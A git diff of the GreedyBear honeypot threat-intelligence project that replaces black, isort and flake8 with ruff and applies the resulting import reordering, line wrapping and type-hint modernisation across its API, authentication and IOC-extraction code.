index 1ff60d09..0f85421e 100644
--- a/.github/workflows/pull_request_automation.yml
+++ b/.github/workflows/pull_request_automation.yml
@@ -19,6 +19,7 @@ jobs:
frontend_directories: frontend
ubuntu_version: latest
+
frontend-tests:
needs: detect-changes
if: ${{ needs.detect-changes.outputs.frontend > 0 }}
@@ -39,9 +40,9 @@ jobs:
use_coverage: true
upload_coverage: true
max_timeout: 15
- ubuntu_version: 22.04
node_versions: >-
["20"]
+ ubuntu_version: latest
backend-tests:
@@ -52,14 +53,17 @@ jobs:
with:
working_directory: .
- use_black: true
- use_isort: true
- use_flake8: true
+ use_black: false
+ use_isort: false
+ use_flake8: false
use_pylint: false
use_bandit: false
use_autoflake: false
+ use_ruff_formatter: true
+ use_ruff_linter: true
requirements_path: requirements/project-requirements.txt
+ packages_path: packages.txt
django_settings_module: greedybear.settings
check_migrations: true
@@ -74,6 +78,7 @@ jobs:
use_memcached: false
use_elastic_search: false
use_rabbitmq: true
+ rabbitmq_version: "4"
use_mongo: false
use_celery: false
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 4987b889..7288a8c9 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -20,3 +20,9 @@ jobs:
publish_on_test_pypi: false
publish_on_npm: false
publish_on_twitter: false
+ publish_on_ecr: false
+ repository: certego-test
+ working_directory: .github/test/python_test
+ dockerfiles: >-
+ ["Dockerfile"]
+ aws_region: eu-central-1
diff --git a/.gitignore b/.gitignore
index 46689f15..9e56261b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,3 +7,6 @@ __pycache__/
mlmodels/
# JetBrains IDEs (PyCharm, IntelliJ, etc.)
.idea/
+# Ruff cache
+.ruff_cache/
+
diff --git a/README.md b/README.md
index aca875b9..9b25f59e 100644
--- a/README.md
+++ b/README.md
@@ -6,8 +6,7 @@
[](https://twitter.com/intel_owl)
[](https://www.linkedin.com/company/intelowl/)
-[](https://github.com/psf/black)
-[](https://pycqa.github.io/isort/)
+[](https://github.com/astral-sh/ruff)
[](https://github.com/intelowlproject/GreedyBear/actions/workflows/codeql-analysis.yml)
[](https://github.com/intelowlproject/GreedyBear/actions/workflows/dependency_review.yml)
[](https://github.com/intelowlproject/GreedyBear/actions/workflows/pull_request_automation.yml)
diff --git a/api/serializers.py b/api/serializers.py
index 63aa694a..83b9da1a 100644
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -3,9 +3,10 @@
from functools import cache
from django.core.exceptions import FieldDoesNotExist
+from rest_framework import serializers
+
from greedybear.consts import REGEX_DOMAIN, REGEX_IP
from greedybear.models import IOC, GeneralHoneypot
-from rest_framework import serializers
logger = logging.getLogger(__name__)
diff --git a/api/urls.py b/api/urls.py
index ec341bcd..7202fc10 100644
--- a/api/urls.py
+++ b/api/urls.py
@@ -1,5 +1,8 @@
# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
# See the file 'LICENSE' for copying permission.
+from django.urls import include, path
+from rest_framework import routers
+
from api.views import (
StatisticsViewSet,
command_sequence_view,
@@ -10,8 +13,6 @@
feeds_pagination,
general_honeypot_list,
)
-from django.urls import include, path
-from rest_framework import routers
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter(trailing_slash=False)
diff --git a/api/views/command_sequence.py b/api/views/command_sequence.py
index 5e75e019..964fc57c 100644
--- a/api/views/command_sequence.py
+++ b/api/views/command_sequence.py
@@ -2,17 +2,22 @@
# See the file 'LICENSE' for copying permission.
import logging
-from api.views.utils import is_ip_address, is_sha256hash
from certego_saas.apps.auth.backend import CookieTokenAuthentication
from django.conf import settings
from django.http import Http404, HttpResponseBadRequest
-from greedybear.consts import GET
-from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+ api_view,
+ authentication_classes,
+ permission_classes,
+)
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
+from api.views.utils import is_ip_address, is_sha256hash
+from greedybear.consts import GET
+from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
+
logger = logging.getLogger(__name__)
@@ -51,7 +56,7 @@ def command_sequence_view(request):
if is_ip_address(observable):
sessions = CowrieSession.objects.filter(source__name=observable, start_time__isnull=False, commands__isnull=False)
- sequences = set(s.commands for s in sessions)
+ sequences = {s.commands for s in sessions}
seqs = [
{
"time": s.start_time,
@@ -62,7 +67,7 @@ def command_sequence_view(request):
]
related_iocs = IOC.objects.filter(cowriesession__commands__in=sequences).distinct().only("name")
if include_similar:
- related_clusters = set(s.cluster for s in sequences if s.cluster is not None)
+ related_clusters = {s.cluster for s in sequences if s.cluster is not None}
related_iocs = IOC.objects.filter(cowriesession__commands__cluster__in=related_clusters).distinct().only("name")
if not seqs:
raise Http404(f"No command sequences found for IP: {observable}")
diff --git a/api/views/cowrie_session.py b/api/views/cowrie_session.py
index 7c0b5299..8fcffcfd 100644
--- a/api/views/cowrie_session.py
+++ b/api/views/cowrie_session.py
@@ -4,17 +4,22 @@
import logging
import socket
-from api.views.utils import is_ip_address, is_sha256hash
from certego_saas.apps.auth.backend import CookieTokenAuthentication
from django.conf import settings
from django.http import Http404, HttpResponseBadRequest
-from greedybear.consts import GET
-from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+ api_view,
+ authentication_classes,
+ permission_classes,
+)
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
+from api.views.utils import is_ip_address, is_sha256hash
+from greedybear.consts import GET
+from greedybear.models import CommandSequence, CowrieSession, Statistics, viewType
+
logger = logging.getLogger(__name__)
@@ -89,8 +94,8 @@ def cowrie_session_view(request):
return HttpResponseBadRequest("Query must be a valid IP address or SHA-256 hash")
if include_similar:
- commands = set(s.commands for s in sessions if s.commands)
- clusters = set(cmd.cluster for cmd in commands if cmd.cluster is not None)
+ commands = {s.commands for s in sessions if s.commands}
+ clusters = {cmd.cluster for cmd in commands if cmd.cluster is not None}
related_sessions = CowrieSession.objects.filter(commands__cluster__in=clusters).prefetch_related("source", "commands")
sessions = sessions.union(related_sessions)
@@ -100,9 +105,9 @@ def cowrie_session_view(request):
if settings.FEEDS_LICENSE:
response_data["license"] = settings.FEEDS_LICENSE
- unique_commands = set(s.commands for s in sessions if s.commands)
+ unique_commands = {s.commands for s in sessions if s.commands}
response_data["commands"] = sorted("\n".join(cmd.commands) for cmd in unique_commands)
- response_data["sources"] = sorted(set(s.source.name for s in sessions), key=socket.inet_aton)
+ response_data["sources"] = sorted({s.source.name for s in sessions}, key=socket.inet_aton)
if include_credentials:
response_data["credentials"] = sorted(set(itertools.chain(*[s.credentials for s in sessions])))
if include_session_data:
diff --git a/api/views/enrichment.py b/api/views/enrichment.py
index 1c49e5d9..3eca1741 100644
--- a/api/views/enrichment.py
+++ b/api/views/enrichment.py
@@ -2,15 +2,20 @@
# See the file 'LICENSE' for copying permission.
import logging
-from api.serializers import EnrichmentSerializer
from certego_saas.apps.auth.backend import CookieTokenAuthentication
-from greedybear.consts import GET
-from greedybear.models import Statistics, viewType
from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+ api_view,
+ authentication_classes,
+ permission_classes,
+)
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
+from api.serializers import EnrichmentSerializer
+from greedybear.consts import GET
+from greedybear.models import Statistics, viewType
+
logger = logging.getLogger(__name__)
diff --git a/api/views/feeds.py b/api/views/feeds.py
index 34a1bda4..617df2ac 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
@@ -2,13 +2,23 @@
# See the file 'LICENSE' for copying permission.
import logging
-from api.views.utils import FeedRequestParams, feeds_response, get_queryset, get_valid_feed_types
from certego_saas.apps.auth.backend import CookieTokenAuthentication
from certego_saas.ext.pagination import CustomPageNumberPagination
-from greedybear.consts import GET
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+ api_view,
+ authentication_classes,
+ permission_classes,
+)
from rest_framework.permissions import IsAuthenticated
+from api.views.utils import (
+ FeedRequestParams,
+ feeds_response,
+ get_queryset,
+ get_valid_feed_types,
+)
+from greedybear.consts import GET
+
logger = logging.getLogger(__name__)
@@ -29,7 +39,7 @@ def feeds(request, feed_type, attack_type, prioritize, format_):
Returns:
Response: The HTTP response with formatted IOC data.
"""
- logger.info(f"request /api/feeds with params: feed type: {feed_type}, " f"attack_type: {attack_type}, prioritization: {prioritize}, format: {format_}")
+ logger.info(f"request /api/feeds with params: feed type: {feed_type}, attack_type: {attack_type}, prioritization: {prioritize}, format: {format_}")
feed_params_data = request.query_params.dict()
feed_params_data.update({"feed_type": feed_type, "attack_type": attack_type, "format_": format_})
diff --git a/api/views/general_honeypot.py b/api/views/general_honeypot.py
index 146ded21..0c10748a 100644
--- a/api/views/general_honeypot.py
+++ b/api/views/general_honeypot.py
@@ -2,11 +2,12 @@
# See the file 'LICENSE' for copying permission.
import logging
-from greedybear.consts import GET
-from greedybear.models import GeneralHoneypot
from rest_framework.decorators import api_view
from rest_framework.response import Response
+from greedybear.consts import GET
+from greedybear.models import GeneralHoneypot
+
logger = logging.getLogger(__name__)
diff --git a/api/views/statistics.py b/api/views/statistics.py
index 042ab6c6..bd3db3a9 100644
--- a/api/views/statistics.py
+++ b/api/views/statistics.py
@@ -6,11 +6,12 @@
from django.db.models import Count, Q
from django.db.models.functions import Trunc
from django.http import HttpResponseServerError
-from greedybear.models import IOC, GeneralHoneypot, Statistics, viewType
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
+from greedybear.models import IOC, GeneralHoneypot, Statistics, viewType
+
logger = logging.getLogger(__name__)
diff --git a/api/views/utils.py b/api/views/utils.py
index 421d0249..7d4d8c66 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -6,16 +6,17 @@
from datetime import datetime, timedelta
from ipaddress import ip_address
-from api.enums import Honeypots
-from api.serializers import FeedsRequestSerializer
from django.conf import settings
from django.contrib.postgres.aggregates import ArrayAgg
from django.db.models import F, Q
from django.http import HttpResponse, HttpResponseBadRequest, StreamingHttpResponse
-from greedybear.models import IOC, GeneralHoneypot, Statistics
from rest_framework import status
from rest_framework.response import Response
+from api.enums import Honeypots
+from api.serializers import FeedsRequestSerializer
+from greedybear.models import IOC, GeneralHoneypot, Statistics
+
logger = logging.getLogger(__name__)
@@ -272,7 +273,11 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
# check if sorting the results by feed_type
if feed_params.feed_type_sorting is not None:
logger.info("Return feeds sorted by feed_type field")
- json_list = sorted(json_list, key=lambda k: k["feed_type"], reverse=feed_params.feed_type_sorting == "-feed_type")
+ json_list = sorted(
+ json_list,
+ key=lambda k: k["feed_type"],
+ reverse=feed_params.feed_type_sorting == "-feed_type",
+ )
logger.info(f"Number of feeds returned: {len(json_list)}")
resp_data = {"iocs": json_list}
diff --git a/authentication/admin.py b/authentication/admin.py
index fdd1e3bd..21eb7775 100644
--- a/authentication/admin.py
+++ b/authentication/admin.py
@@ -1,6 +1,5 @@
# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
# See the file 'LICENSE' for copying permission.
-from typing import Optional
import email_utils
from certego_saas.apps.user.admin import AbstractUserAdmin
@@ -38,7 +37,7 @@ class UserAdminView(AbstractUserAdmin):
actions = ["accept_users", "decline_users"]
@admin.display(boolean=True)
- def is_email_verified(self, obj: User) -> Optional[bool]:
+ def is_email_verified(self, obj: User) -> bool | None:
return obj.is_email_verified
@admin.action(description="Decline selected users")
@@ -124,7 +123,7 @@ def user_is_active(self, obj: UserProfile) -> bool:
return obj.user.is_active
@admin.display(boolean=True)
- def user_is_approved(self, obj: UserProfile) -> Optional[bool]:
+ def user_is_approved(self, obj: UserProfile) -> bool | None:
return obj.user.approved
diff --git a/authentication/migrations/0001_initial.py b/authentication/migrations/0001_initial.py
index 42f67e22..da2dc841 100644
--- a/authentication/migrations/0001_initial.py
+++ b/authentication/migrations/0001_initial.py
@@ -1,13 +1,12 @@
# Generated by Django 3.2.18 on 2023-03-22 16:14
-from django.conf import settings
import django.core.validators
-from django.db import migrations, models
import django.db.models.deletion
+from django.conf import settings
+from django.db import migrations, models
class Migration(migrations.Migration):
-
initial = True
dependencies = [
@@ -18,15 +17,46 @@ class Migration(migrations.Migration):
migrations.CreateModel(
name="UserProfile",
fields=[
- ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
- ("company_name", models.CharField(max_length=32, validators=[django.core.validators.MinLengthValidator(3)])),
- ("company_role", models.CharField(max_length=32, validators=[django.core.validators.MinLengthValidator(3)])),
- ("twitter_handle", models.CharField(blank=True, default="", max_length=16, validators=[django.core.validators.MinLengthValidator(3)])),
+ (
+ "id",
+ models.BigAutoField(
+ auto_created=True,
+ primary_key=True,
+ serialize=False,
+ verbose_name="ID",
+ ),
+ ),
+ (
+ "company_name",
+ models.CharField(
+ max_length=32,
+ validators=[django.core.validators.MinLengthValidator(3)],
+ ),
+ ),
+ (
+ "company_role",
+ models.CharField(
+ max_length=32,
+ validators=[django.core.validators.MinLengthValidator(3)],
+ ),
+ ),
+ (
+ "twitter_handle",
+ models.CharField(
+ blank=True,
+ default="",
+ max_length=16,
+ validators=[django.core.validators.MinLengthValidator(3)],
+ ),
+ ),
(
"discover_from",
models.CharField(
choices=[
- ("search_engine", "Search Engine (Google, DuckDuckGo, etc.)"),
+ (
+ "search_engine",
+ "Search Engine (Google, DuckDuckGo, etc.)",
+ ),
("was_recommended", "Recommended by friend or colleague"),
("social_media", "Social media"),
("blog_or_publication", "Blog or Publication"),
@@ -36,7 +66,14 @@ class Migration(migrations.Migration):
max_length=32,
),
),
- ("user", models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name="user_profile", to=settings.AUTH_USER_MODEL)),
+ (
+ "user",
+ models.OneToOneField(
+ on_delete=django.db.models.deletion.CASCADE,
+ related_name="user_profile",
+ to=settings.AUTH_USER_MODEL,
+ ),
+ ),
],
options={
"verbose_name_plural": "User Profiles",
diff --git a/authentication/serializers.py b/authentication/serializers.py
index 78107c9c..bece6cad 100644
--- a/authentication/serializers.py
+++ b/authentication/serializers.py
@@ -8,15 +8,14 @@
from certego_saas.models import User
from certego_saas.settings import certego_apps_settings
from django.conf import settings
-from django.contrib.auth import password_validation
from django.core.exceptions import ValidationError
from django.db import DatabaseError, transaction
-from django.utils.translation import gettext_lazy as _
-from greedybear.consts import REGEX_PASSWORD
from rest_framework import serializers as rfs
from rest_framework.authtoken.serializers import AuthTokenSerializer
from slack_sdk.errors import SlackApiError
+from greedybear.consts import REGEX_PASSWORD
+
from .models import UserProfile
logger = logging.getLogger(__name__)
@@ -103,9 +102,9 @@ def validate_key(self, key):
# custom error messages
err_str = str(exc.detail)
if "invalid" in err_str:
- exc.detail = "The provided verification key" " is invalid or your email address is already verified."
+ exc.detail = "The provided verification key is invalid or your email address is already verified."
if "expired" in err_str:
- exc.detail = "The provided verification key" " has expired or your email address is already verified."
+ exc.detail = "The provided verification key has expired or your email address is already verified."
raise exc
def save(self):
@@ -122,7 +121,7 @@ def save(self):
try:
userprofile = user.user_profile
user_admin_link = f"{settings.HOST_URI}/admin/certego_saas_user/user/{user.pk}"
- userprofile_admin_link = f"{settings.HOST_URI}" f"/admin/authentication/userprofile/{userprofile.pk}"
+ userprofile_admin_link = f"{settings.HOST_URI}/admin/authentication/userprofile/{userprofile.pk}"
slack = Slack()
slack.send_message(
title="Newly registered user!!",
diff --git a/authentication/views.py b/authentication/views.py
index 80d5e65d..2571949b 100644
--- a/authentication/views.py
+++ b/authentication/views.py
@@ -1,5 +1,4 @@
import logging
-from typing import List
import rest_email_auth.views
from certego_saas.apps.auth import views as certego_views
@@ -9,15 +8,24 @@
from django.contrib.auth import get_user_model, login
from django.core.cache import cache
from durin import views as durin_views
-from greedybear.consts import GET
-from greedybear.enums import FrontendPage
-from greedybear.settings import AUTH_USER_MODEL
from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+ api_view,
+ authentication_classes,
+ permission_classes,
+)
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
-from .serializers import EmailVerificationSerializer, LoginSerializer, RegistrationSerializer
+from greedybear.consts import GET
+from greedybear.enums import FrontendPage
+from greedybear.settings import AUTH_USER_MODEL
+
+from .serializers import (
+ EmailVerificationSerializer,
+ LoginSerializer,
+ RegistrationSerializer,
+)
logger = logging.getLogger(__name__)
@@ -27,35 +35,35 @@
class PasswordResetRequestView(rest_email_auth.views.PasswordResetRequestView):
- authentication_classes: List = []
- permission_classes: List = []
- throttle_classes: List = [POSTUserRateThrottle]
+ authentication_classes: list = []
+ permission_classes: list = []
+ throttle_classes: list = [POSTUserRateThrottle]
class PasswordResetView(rest_email_auth.views.PasswordResetView):
- authentication_classes: List = []
- permission_classes: List = []
- throttle_classes: List = [POSTUserRateThrottle]
+ authentication_classes: list = []
+ permission_classes: list = []
+ throttle_classes: list = [POSTUserRateThrottle]
class EmailVerificationView(rest_email_auth.views.EmailVerificationView):
- authentication_classes: List = []
- permission_classes: List = []
- throttle_classes: List = [POSTUserRateThrottle]
+ authentication_classes: list = []
+ permission_classes: list = []
+ throttle_classes: list = [POSTUserRateThrottle]
serializer_class = EmailVerificationSerializer
class RegistrationView(rest_email_auth.views.RegistrationView):
- authentication_classes: List = []
- permission_classes: List = []
- throttle_classes: List = [POSTUserRateThrottle]
+ authentication_classes: list = []
+ permission_classes: list = []
+ throttle_classes: list = [POSTUserRateThrottle]
serializer_class = RegistrationSerializer
class ResendVerificationView(rest_email_auth.views.ResendVerificationView):
- authentication_classes: List = []
- permission_classes: List = []
- throttle_classes: List = [POSTUserRateThrottle]
+ authentication_classes: list = []
+ permission_classes: list = []
+ throttle_classes: list = [POSTUserRateThrottle]
@api_view([GET])
@@ -87,7 +95,12 @@ def checkConfiguration(request):
errors["AWS SES backend"] = "configuration required"
else:
# SMTP backend
- required_variables = [settings.EMAIL_HOST, settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD, settings.EMAIL_PORT]
+ required_variables = [
+ settings.EMAIL_HOST,
+ settings.EMAIL_HOST_USER,
+ settings.EMAIL_HOST_PASSWORD,
+ settings.EMAIL_PORT,
+ ]
for variable in required_variables:
if not variable:
errors["SMTP backend"] = "configuration required"
diff --git a/greedybear/admin.py b/greedybear/admin.py
index 763c6db1..8d5bcee6 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -5,7 +5,18 @@
from django.contrib import admin, messages
from django.db.models import Q
from django.utils.translation import ngettext
-from greedybear.models import IOC, CommandSequence, CowrieSession, FireHolList, GeneralHoneypot, MassScanner, Sensor, Statistics, WhatsMyIPDomain
+
+from greedybear.models import (
+ IOC,
+ CommandSequence,
+ CowrieSession,
+ FireHolList,
+ GeneralHoneypot,
+ MassScanner,
+ Sensor,
+ Statistics,
+ WhatsMyIPDomain,
+)
logger = logging.getLogger(__name__)
diff --git a/greedybear/celery.py b/greedybear/celery.py
index 34311df0..e3d79c4e 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -1,6 +1,5 @@
# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
# See the file 'LICENSE' for copying permission.
-from __future__ import absolute_import, unicode_literals
import os
@@ -8,9 +7,10 @@
from celery.schedules import crontab
from celery.signals import setup_logging
from django.conf import settings
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
from kombu import Exchange, Queue
+from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
+
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "greedybear.settings")
app = Celery("greedybear")
diff --git a/greedybear/cronjobs/cleanup.py b/greedybear/cronjobs/cleanup.py
index 62ec4a57..021e503d 100644
--- a/greedybear/cronjobs/cleanup.py
+++ b/greedybear/cronjobs/cleanup.py
@@ -2,7 +2,11 @@
from greedybear.cronjobs.base import Cronjob
from greedybear.models import IOC, CommandSequence, CowrieSession
-from greedybear.settings import COMMAND_SEQUENCE_RETENTION, COWRIE_SESSION_RETENTION, IOC_RETENTION
+from greedybear.settings import (
+ COMMAND_SEQUENCE_RETENTION,
+ COWRIE_SESSION_RETENTION,
+ IOC_RETENTION,
+)
class CleanUp(Cronjob):
diff --git a/greedybear/cronjobs/commands/cluster.py b/greedybear/cronjobs/commands/cluster.py
index 88de64e6..583a1fd2 100644
--- a/greedybear/cronjobs/commands/cluster.py
+++ b/greedybear/cronjobs/commands/cluster.py
@@ -51,7 +51,7 @@ def run(self) -> None:
tokenized_seqs = [tokenize(s.commands) for s in sequences]
cluster_labels = LSHConnectedComponents().get_components(tokenized_seqs)
seqs_to_update = []
- for seq, label in zip(sequences, cluster_labels):
+ for seq, label in zip(sequences, cluster_labels, strict=False):
if seq.cluster != label:
seq.cluster = label
seqs_to_update.append(seq)
diff --git a/greedybear/cronjobs/extraction/ioc_processor.py b/greedybear/cronjobs/extraction/ioc_processor.py
index 93b0f189..eb7a9865 100644
--- a/greedybear/cronjobs/extraction/ioc_processor.py
+++ b/greedybear/cronjobs/extraction/ioc_processor.py
@@ -1,5 +1,4 @@
import logging
-from typing import Optional
from greedybear.consts import PAYLOAD_REQUEST, SCANNER
from greedybear.cronjobs.extraction.utils import is_whatsmyip_domain
@@ -27,7 +26,7 @@ def __init__(self, ioc_repo: IocRepository, sensor_repo: SensorRepository):
self.ioc_repo = ioc_repo
self.sensor_repo = sensor_repo
- def add_ioc(self, ioc: IOC, attack_type: str, general_honeypot_name: str = None) -> Optional[IOC]:
+ def add_ioc(self, ioc: IOC, attack_type: str, general_honeypot_name: str = None) -> IOC | None:
"""
Process an IOC record.
Filters out sensor IPs and whats-my-ip domains, then creates a new
diff --git a/greedybear/cronjobs/extraction/pipeline.py b/greedybear/cronjobs/extraction/pipeline.py
index 0adec1b8..189140dc 100644
--- a/greedybear/cronjobs/extraction/pipeline.py
+++ b/greedybear/cronjobs/extraction/pipeline.py
@@ -2,9 +2,17 @@
from collections import defaultdict
from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
-from greedybear.cronjobs.repositories import ElasticRepository, IocRepository, SensorRepository
+from greedybear.cronjobs.repositories import (
+ ElasticRepository,
+ IocRepository,
+ SensorRepository,
+)
from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-from greedybear.settings import EXTRACTION_INTERVAL, INITIAL_EXTRACTION_TIMESPAN, LEGACY_EXTRACTION
+from greedybear.settings import (
+ EXTRACTION_INTERVAL,
+ INITIAL_EXTRACTION_TIMESPAN,
+ LEGACY_EXTRACTION,
+)
class ExtractionPipeline:
diff --git a/greedybear/cronjobs/extraction/strategies/cowrie.py b/greedybear/cronjobs/extraction/strategies/cowrie.py
index dd29cd24..65afa93a 100644
--- a/greedybear/cronjobs/extraction/strategies/cowrie.py
+++ b/greedybear/cronjobs/extraction/strategies/cowrie.py
@@ -3,18 +3,25 @@
import re
from collections import defaultdict
from hashlib import sha256
-from typing import Optional
from urllib.parse import urlparse
from greedybear.consts import PAYLOAD_REQUEST, SCANNER
from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy
-from greedybear.cronjobs.extraction.utils import get_ioc_type, iocs_from_hits, threatfox_submission
-from greedybear.cronjobs.repositories import CowrieSessionRepository, IocRepository, SensorRepository
+from greedybear.cronjobs.extraction.utils import (
+ get_ioc_type,
+ iocs_from_hits,
+ threatfox_submission,
+)
+from greedybear.cronjobs.repositories import (
+ CowrieSessionRepository,
+ IocRepository,
+ SensorRepository,
+)
from greedybear.models import IOC, CommandSequence, CowrieSession
from greedybear.regex import REGEX_URL_PROTOCOL
-def parse_url_hostname(url: str) -> Optional[str]:
+def parse_url_hostname(url: str) -> str | None:
"""
Extract hostname from URL safely.
@@ -92,7 +99,7 @@ def extract_from_hits(self, hits: list[dict]) -> None:
self._extract_possible_payload_in_messages(hits)
self._get_url_downloads(hits)
self.log.info(
- f"added {len(self.ioc_records)} scanners, " f"{self.payloads_in_message} payloads found in messages, " f"{self.added_url_downloads} download URLs"
+ f"added {len(self.ioc_records)} scanners, {self.payloads_in_message} payloads found in messages, {self.added_url_downloads} download URLs"
)
def _get_scanners(self, hits: list[dict]) -> None:
@@ -208,7 +215,7 @@ def _get_sessions(self, ioc: IOC, hits: list[dict]) -> None:
if session_record.commands is not None:
self._deduplicate_command_sequence(session_record)
self.session_repo.save_command_sequence(session_record.commands)
- self.log.info(f"saved new command execute from {ioc.name} " f"with hash {session_record.commands.commands_hash}")
+ self.log.info(f"saved new command execute from {ioc.name} with hash {session_record.commands.commands_hash}")
self.ioc_repo.save(session_record.source)
self.session_repo.save_session(session_record)
@@ -268,7 +275,7 @@ def _add_fks(self, scanner_ip: str, hostname: str) -> None:
# Log warning if IOCs are missing - shouldn't happen in normal operation
if not scanner_ip_instance or not hostname_instance:
self.log.warning(
- f"Cannot link IOCs - missing from database: " f"scanner_ip={scanner_ip_instance is not None}, " f"hostname={hostname_instance is not None}"
+ f"Cannot link IOCs - missing from database: scanner_ip={scanner_ip_instance is not None}, hostname={hostname_instance is not None}"
)
return
diff --git a/greedybear/cronjobs/extraction/strategies/factory.py b/greedybear/cronjobs/extraction/strategies/factory.py
index 16c70d11..4efdf11a 100644
--- a/greedybear/cronjobs/extraction/strategies/factory.py
+++ b/greedybear/cronjobs/extraction/strategies/factory.py
@@ -1,4 +1,9 @@
-from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy, CowrieExtractionStrategy, GenericExtractionStrategy, Log4potExtractionStrategy
+from greedybear.cronjobs.extraction.strategies import (
+ BaseExtractionStrategy,
+ CowrieExtractionStrategy,
+ GenericExtractionStrategy,
+ Log4potExtractionStrategy,
+)
from greedybear.cronjobs.repositories import IocRepository, SensorRepository
diff --git a/greedybear/cronjobs/extraction/strategies/log4pot.py b/greedybear/cronjobs/extraction/strategies/log4pot.py
index 3d0e8c4f..c2e92bb1 100644
--- a/greedybear/cronjobs/extraction/strategies/log4pot.py
+++ b/greedybear/cronjobs/extraction/strategies/log4pot.py
@@ -2,7 +2,6 @@
# See the file 'LICENSE' for copying permission.
import base64
import re
-from typing import Optional
from urllib.parse import urlparse
from greedybear.consts import PAYLOAD_REQUEST, SCANNER
@@ -62,10 +61,10 @@ def extract_from_hits(self, hits: list[dict]) -> None:
if match_command:
# we are losing the protocol but that's ok for now
base64_encoded = match_command.group(1)
- self.log.info(f"found base64 encoded command {base64_encoded}" f" in payload from base64 code for CVE-2021-44228")
+ self.log.info(f"found base64 encoded command {base64_encoded} in payload from base64 code for CVE-2021-44228")
try:
decoded_str = base64.b64decode(base64_encoded).decode()
- self.log.info(f"decoded base64 command to {decoded_str}" f" from payload from base64 code for CVE-2021-44228")
+ self.log.info(f"decoded base64 command to {decoded_str} from payload from base64 code for CVE-2021-44228")
except Exception as e:
self.log.warning(e, stack_info=True)
else:
@@ -74,7 +73,7 @@ def extract_from_hits(self, hits: list[dict]) -> None:
hidden_url = match_url.group()
if "://" not in hidden_url:
hidden_url = "tcp://" + hidden_url
- self.log.info(f"found hidden URL {hidden_url}" f" in payload for CVE-2021-44228")
+ self.log.info(f"found hidden URL {hidden_url} in payload for CVE-2021-44228")
hidden_hostname = urlparse(hidden_url).hostname
self.log.info(f"extracted hostname {hidden_hostname} from {hidden_url}")
@@ -112,7 +111,7 @@ def extract_from_hits(self, hits: list[dict]) -> None:
# once all have added, we can add the foreign keys
self._add_fks(scanner_ip, hostname, hidden_hostname)
- self.log.info(f"added {added_scanners} scanners, {added_payloads}" f" payloads" f" and {added_hidden_payloads} hidden payloads")
+ self.log.info(f"added {added_scanners} scanners, {added_payloads} payloads and {added_hidden_payloads} hidden payloads")
def _add_fks(self, scanner_ip: str, hostname: str, hidden_hostname: str) -> None:
self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}, {hidden_hostname}")
@@ -141,7 +140,7 @@ def _add_fks(self, scanner_ip: str, hostname: str, hidden_hostname: str) -> None
hidden_hostname_instance.related_ioc.add(scanner_ip_instance)
self.ioc_repo.save(hidden_hostname_instance)
- def _get_scanner_ip(self, correlation_id: str, hits: list[dict]) -> Optional[str]:
+ def _get_scanner_ip(self, correlation_id: str, hits: list[dict]) -> str | None:
self.log.info(f"extracting scanner IP from correlation_id {correlation_id}")
filtered_hits = [hit for hit in hits if str(hit.get("correlation_id", "")) == str(correlation_id) and hit.get("reason", "") == "request"]
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 0d64010d..5ca11253 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -6,6 +6,7 @@
import requests
from django.conf import settings
+
from greedybear.consts import DOMAIN, IP
from greedybear.models import IOC, FireHolList, MassScanner, WhatsMyIPDomain
@@ -204,7 +205,12 @@ def threatfox_submission(ioc_record: IOC, related_urls: list, log: Logger) -> No
"iocs": urls_to_submit,
}
try:
- r = requests.post("https://threatfox-api.abuse.ch/api/v1/", headers=headers, json=json_data, timeout=5)
+ r = requests.post(
+ "https://threatfox-api.abuse.ch/api/v1/",
+ headers=headers,
+ json=json_data,
+ timeout=5,
+ )
except requests.RequestException as e:
log.exception(f"Threatfox push error: {e}")
else:
diff --git a/greedybear/cronjobs/firehol.py b/greedybear/cronjobs/firehol.py
index a9b5b54a..87498835 100644
--- a/greedybear/cronjobs/firehol.py
+++ b/greedybear/cronjobs/firehol.py
@@ -1,6 +1,7 @@
import requests
+
from greedybear.cronjobs.base import Cronjob
